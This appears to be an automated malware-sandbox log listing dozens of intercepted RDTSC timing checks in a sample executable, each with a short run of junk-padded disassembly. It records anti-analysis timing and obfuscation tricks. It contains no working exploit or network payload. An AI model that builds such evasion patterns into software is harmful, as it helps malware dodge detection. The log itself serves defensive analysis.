                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26244 second address: D2624E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2624E second address: D26260 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F0EC4CB7FD0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26260 second address: D262B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F0EC4502023h 0x0000000c mov ecx, dword ptr [ebp+122D1E8Dh] 0x00000012 mov ebx, dword ptr [ebp+1248A233h] 0x00000018 add eax, ebx 0x0000001a jp 00007F0EC450201Ch 0x00000020 nop 0x00000021 jmp 00007F0EC4502023h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0EC450201Eh 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D262B9 second address: D2630B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a call 00007F0EC4CB7FD1h 0x0000000f jmp 00007F0EC4CB7FCAh 0x00000014 pop ecx 0x00000015 push 00000004h 0x00000017 mov edx, dword ptr [ebp+122D30ACh] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0EC4CB7FD6h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D8100F second address: D81014 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D81014 second address: D8101F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D8101F second address: D81023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D804AB second address: D804B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D80A54 second address: D80A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D80A5A second address: D80A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D86C60 second address: D86C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D86DD5 second address: D86DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F0EC4CB7FC6h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jns 00007F0EC4CB7FC6h 0x0000001d jnl 00007F0EC4CB7FC6h 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D86DF9 second address: D86E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0EC4502016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D86E05 second address: D86E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D86F72 second address: D86FA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502024h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F0EC4502022h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D87ACA second address: D87ACF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D8C7F3 second address: D8C7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D8CC24 second address: D8CC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0EC4CB7FC6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D8CC2E second address: D8CC38 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D8CC38 second address: D8CC3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D8CC3E second address: D8CC49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9A40B second address: D9A424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D98F33 second address: D98F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502024h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D98F4C second address: D98F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0EC4CB7FCAh 0x00000008 jno 00007F0EC4CB7FC6h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D98F63 second address: D98F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D990E4 second address: D990EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0EC4CB7FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D990EF second address: D990F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D994C5 second address: D994E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007F0EC4CB7FD7h 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D98299 second address: D982B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F0EC4502024h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9F78E second address: D9F794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9F932 second address: D9F94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0EC4502016h 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007F0EC4502016h 0x00000012 jp 00007F0EC4502016h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9F94C second address: D9F96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F0EC4CB7FD0h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9F96B second address: D9F971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9F971 second address: D9F975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9F975 second address: D9F981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9FADA second address: D9FB07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD5h 0x00000007 jmp 00007F0EC4CB7FD4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D9FB07 second address: D9FB0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAB27E second address: DAB288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAB288 second address: DAB28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAB28C second address: DAB292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAB292 second address: DAB298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAB298 second address: DAB2B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD5h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAB2B1 second address: DAB2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAB2B5 second address: DAB2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0EC4CB7FC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0EC4CB7FD0h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAB2D8 second address: DAB2DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAFBDA second address: DAFBDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAFD50 second address: DAFD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAFD54 second address: DAFD65 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0EC4CB7FC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DAFD65 second address: DAFD82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jmp 00007F0EC450201Bh 0x0000000e pushad 0x0000000f jns 00007F0EC4502016h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DB5366 second address: DB5370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0EC4CB7FC6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DB5370 second address: DB537A instructions: 0x00000000 rdtsc 0x00000002 je 00007F0EC450201Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DBCDB5 second address: DBCDCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007F0EC4CB7FC6h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0EC4CB7FC6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DBE30A second address: DBE31A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DBE31A second address: DBE31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DBE31E second address: DBE326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DBE326 second address: DBE32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC58DF second address: DC58E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC5A51 second address: DC5A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007F0EC4CB7FC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC5BC6 second address: DC5BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 ja 00007F0EC4502016h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ebx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC5BD7 second address: DC5BDE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC5D43 second address: DC5D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0EC4502027h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC9509 second address: DC953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0EC4CB7FD8h 0x0000000a jo 00007F0EC4CB7FCCh 0x00000010 jg 00007F0EC4CB7FC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F0EC4CB7FC6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC953C second address: DC9540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC96E9 second address: DC96F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0EC4CB7FC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DC96F5 second address: DC96FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DD5659 second address: DD565D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DD565D second address: DD5661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: DE87EF second address: DE87F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E01BF3 second address: E01BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E01BF7 second address: E01C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0EC4CB7FCDh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F0EC4CB7FD9h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E01C27 second address: E01C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push edx 0x00000009 jmp 00007F0EC4502022h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E020AC second address: E020C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCBh 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F0EC4CB7FC6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E0220A second address: E0221F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502020h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E0B004 second address: E0B01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD7h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E0B01F second address: E0B023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E0CB0F second address: E0CB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: E0CB13 second address: E0CB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jbe 00007F0EC4502032h 0x0000000d jmp 00007F0EC450201Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F0EC4502016h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70137 second address: 4D7013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D7013D second address: 4D7014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D7014C second address: 4D70152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70152 second address: 4D7016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D7016B second address: 4D7016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D7016F second address: 4D70175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D70175 second address: 4D7018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D7018A second address: 4D7018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DA000B second address: 4DA0029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A164h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 mov cx, D63Dh 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4DA0029 second address: 4DA002F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D3008D second address: 4D3009C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D3009C second address: 4D300C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D300C0 second address: 4D300DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D300DA second address: 4D300E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: 4D300E0 second address: 4D300E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
